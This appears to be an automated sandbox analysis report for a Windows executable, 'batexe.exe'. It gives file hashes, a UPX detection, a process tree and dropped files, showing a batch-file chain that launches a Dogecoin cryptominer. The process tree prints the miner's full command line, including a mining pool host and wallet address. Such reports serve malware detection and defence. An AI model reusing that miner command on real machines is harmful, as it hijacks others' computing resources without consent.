73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
300s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12-02-2024 04:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2200	b2e.exe
4872	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4872	cpuminer-sse2.exe
4872	cpuminer-sse2.exe
4872	cpuminer-sse2.exe
4872	cpuminer-sse2.exe
4872	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4280-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4280 wrote to memory of 2200	4280	batexe.exe	73
PID 4280 wrote to memory of 2200	4280	batexe.exe	73
PID 4280 wrote to memory of 2200	4280	batexe.exe	73
PID 2200 wrote to memory of 4092	2200	b2e.exe	74
PID 2200 wrote to memory of 4092	2200	b2e.exe	74
PID 2200 wrote to memory of 4092	2200	b2e.exe	74
PID 4092 wrote to memory of 4872	4092	cmd.exe	77
PID 4092 wrote to memory of 4872	4092	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4280
- C:\Users\Admin\AppData\Local\Temp\AB34.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\AB34.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\AB34.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B006.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4092
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AB34.tmp\b2e.exe

Filesize
6.8MB

MD5
2037d95b69bc8f86cafe4199f036740f

SHA1
7299fce8a36f05d6339921c7fe3d8d3e3232c6a4

SHA256
ed3df978ba5987abfabc545e293f980060a50482961c973bf5d7d8cb68004051

SHA512
73a99986eca12a6393c5e9aad050172f33fd504dfb5737759de1b4e7849617095347af8158489f8067f5dc9dbf8bdfd36087fb8f0cefb7c0981f213533c27c4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\AB34.tmp\b2e.exe

Filesize
7.5MB

MD5
eb3eed2fffb5131c72c5a4cf13f5dd55

SHA1
0e61e722591e4c2dbf46132960130778b74b6bf8

SHA256
e8fb8faf1951245d5533afe3db3f3748f9130e82bf7a2f757c6b60353e830901

SHA512
bf242cc282816e2315ed9f66e111e8cf751f815fa3d748e60eda89d6e7afa7944844df10e273c4cfc6bc2ced07c19cd3ed5cafa9d6544138ed311742311ff852

Download Submit
C:\Users\Admin\AppData\Local\Temp\B006.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
896KB

MD5
9f9a8fea08bacf3a1d155567fead5940

SHA1
9d9ba8746c585446f53f442b800e1eb28a0df86a

SHA256
a22f9d8fb953e4f6bc93cdcc8aa650a5a093f1dd400fdc501d5aa7b00bee0289

SHA512
d41a048619373832c616d48f919595ac50dfbbd68095aec008b30adde91ceeeb86326c7d412ab20d937bab7096fb8165d3da8b4fdc40a03cc32da9ee3e9dc2a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
904KB

MD5
7b0452d12291a823cd4be3a055734c26

SHA1
cd681dba7f24e663855b0082a1857e058d995edd

SHA256
6ebd1f82238ec61428e6f70f6e8a477e8a173ae772c7d180b564c57155c332ab

SHA512
62e180c7c9a7dd6e19f6791723dcf0050244a80ddef25d660b0e96b991e5f585dfa7bc2b1cecd75b18ff4f74b4b13e6cf090105f6263ba9b90a627d8032f586e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
896KB

MD5
f83929cce536e71a3a11e2236c2c6c5f

SHA1
bd0065486a784f1c91e08ada0c3a8f383e23c874

SHA256
f3c7a692875dec174d83dd723c63661fc9de1c0b6548fe3a3f8f8f2015507798

SHA512
815083437ad5659626fba85fa9e31a33ba418d3e1d5f1ec1c7ba77ff5214618493b37821aae3b5b52838ad47f4a7e8c4a3594ee0f970025bc3ee425e9eb50152

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
896KB

MD5
4ece07a08273d0d0db84220926c3d32f

SHA1
d90712e2e643311a963676e87f6afad0c421d895

SHA256
d82c02350e5ca5ebe35d4349a16c3c9986aaecd8be71c05a00b1af09039a4cf3

SHA512
fa010b4c3c0e6d38bb281b4541c0e8b124e05d2feaa6dc11cb6e9c1d85145d5885a5cd61c1bca283f2d9f30295b197343311306acc9d5393aef64793067cdcab

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
91KB

MD5
aec87e54f17a83471fb377d294ac2dc7

SHA1
5c9eb75f63c749bf4bdf870406f3bcedeb902ca3

SHA256
1ab4f8bddff00c4d4ce88c45d364472b21df39ba05cd7237b8196d43ac14ebc0

SHA512
9eb6778d039af97fb0e73f278ddd635c42e214021d64f413f29f09193453d6c0d42766bc083adf14dc80830affb9b3686394cb42488849c6c8b107577fc01b45

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
46KB

MD5
dd74646daaa843641d0c8a649ac74d38

SHA1
7abaefa96b3e8817e71c0958f826c63f4dfad24e

SHA256
3bdf987a981c419f9b4d0909862e154c088e041fc29467dbe53b44527fc0cf6d

SHA512
5abf0e0e42f8f84ecda29cc27fb176d85354636913799d9abe26042b7cf61a3fa8f7cbbe1c6c80e5ae805019a275e9a74e52a7183c33151de25e628a7d2c5480

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
664KB

MD5
0bc3eb5de8fdfa1e7d32200d6ed24c1a

SHA1
8831aa7e56f3e269ff431668948d692e86f5b68c

SHA256
f9f351238ae3cac0c7ba58b05397c2418ea24d3ea5203653614148daa3aa28a2

SHA512
a1d6f4ea32e9c98ae87fd43d72bcb2b506d16de452f546e4f1a0debd3ff277b81e6f947aef0de619e21068e42278ef19eb286be519abd438e72edf532c24b557

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
597KB

MD5
6420e10b4ce0c2b8f4da8496cb1d841c

SHA1
652eedcfba52f3274caf33dc998f84233facee21

SHA256
552778d1a4173954c21910b4245f9695a2291549457f3818c6fb14a8d00102bd

SHA512
6b1ca3c6f914fb2da15d9c33d35fb3e92b946c88a9181cc78e47a8c37653e40ce58359d7a870b162947c2507c720a40ba42104a71e3f2f451b5a9efc67084b4d

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
151KB

MD5
f38356ccc9a09f15c39a9edf53771cf4

SHA1
0cf50f8ea25fc42bdba1f5f78b4b20a007b32efb

SHA256
ae1653238741438280f48304ca935bd81bfc0e4968196c5bc2a45e79b6225f12

SHA512
fd0b5e9ab7e83c08f7f4466922de1619130802f28be452466fce9afaa24979147d27d3eb53244fc572b612fb60de810ed0e1d2a36dcb181778ec12afa3865dad

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
116KB

MD5
b01d38611f700f53d0222ff2a859f74f

SHA1
f970ee2e9fc0af2b369fb78dc765ca900416595d

SHA256
69654d4505750e566c4d40b0455798f4ae761c916f1df5ab870aee6164f4c094

SHA512
d3ea6bfb278dfdb894836e1d5ed9ebcad003dac1c4bd1a3ca70ec84397b152405663a41f67576954492be4091c80801bf501996c01c70f0e4a23bd8a98d89383

Download Submit
memory/2200-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2200-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4280-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4872-43-0x0000000063360000-0x00000000633F8000-memory.dmp

Filesize
608KB

Download
memory/4872-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4872-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4872-44-0x0000000000E60000-0x0000000002715000-memory.dmp

Filesize
24.7MB

Download
memory/4872-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4872-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4872-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4872-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4872-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4872-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4872-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4872-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4872-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download